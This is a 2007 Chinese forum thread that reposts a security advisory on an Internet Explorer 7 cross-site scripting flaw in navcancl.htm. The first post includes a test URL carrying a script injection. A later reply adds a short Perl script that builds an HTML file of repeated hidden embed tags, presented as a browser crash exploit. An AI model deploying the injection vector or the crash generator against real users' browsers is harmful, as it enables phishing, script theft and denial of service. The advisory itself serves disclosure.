QPhome# 青浦之家论坛

QQ登录

只需一步,快速开始

2122

积分

13

好友

374

主题
1
发表于 2007-3-25 20:24:33 | 查看: 2609| 回复: 3
影响版本:
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
详细说明:
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer包含的navcancl.htm存在输入验证问题,远程攻击者可以利用漏洞进行跨站脚本攻击,可以获得敏感信息。

当特定页面取消时,页面URL会提供给navcancl.htm处理,类似res://ieframe.dll/navcancl.htm#[url]http://www.site.com[/url],navcancl.htm然后在“Refresh the page.”中生成脚本,当用户点链接时重新装载提供的站点,但是由于输入验证问题,可导致插入恶意脚本到提供的链接中,然后在“Refresh the page.”操作时执行。虽然Internet Explorer现在很多本地资源(包括navcancl.htm)运行在“Internet Zone”中,可导致不能利用为代码执行。但是由于IE7的设计错误,浏览器会自动删除本地资源的URL路径,因此可以进行恶意页面的钓鱼攻击。


参考:
[url]http://www.securityfocus.com/archive/1/462833[/url]
解决方案:
目前没有解决方案提供:

[url]http://www.microsoft.com/ie/[/url]
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!


res://ieframe.dll/navcancl.htm#[url]http://www.example.com/[/url][script]


//Sebug.net
分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
转发到微博

收藏回复 只看该作者 道具 举报

2
发表于 2007-3-25 20:33:02



我完美的IE7  
漏洞 ..
来了

回复 只看该作者 道具 举报

3
发表于 2007-3-25 20:37:54
[size=5][color=Red]哟 哟 哟 哟....[/color][/size]   [color=Blue][size=7]很FZ[/size][/color]





回复 只看该作者 道具 举报

4
发表于 2007-3-25 23:10:53

Mozilla,IE6,IE7 Crash 漏洞

来源:转载  发布时间:2007-3-23 0:47:25


#!/usr/bin/perl
#wenping050.cnxhacker.net
print "\nFirefox,IE6,IE7 Crash File\n";
print "Music file:";chomp($musik=<STDIN>);
open(CRASH, ">./crash.html") or die "cannot create file\n";
print CRASH "<embed src="/$musik" autostart=true loop=true hidden=true height=0 width=0>" x 150;
close(JPG);
print "Done....safed to crash.html\n";

回复 只看该作者 道具 举报

您需要登录后才可以回帖 登录 | 注册

回顶部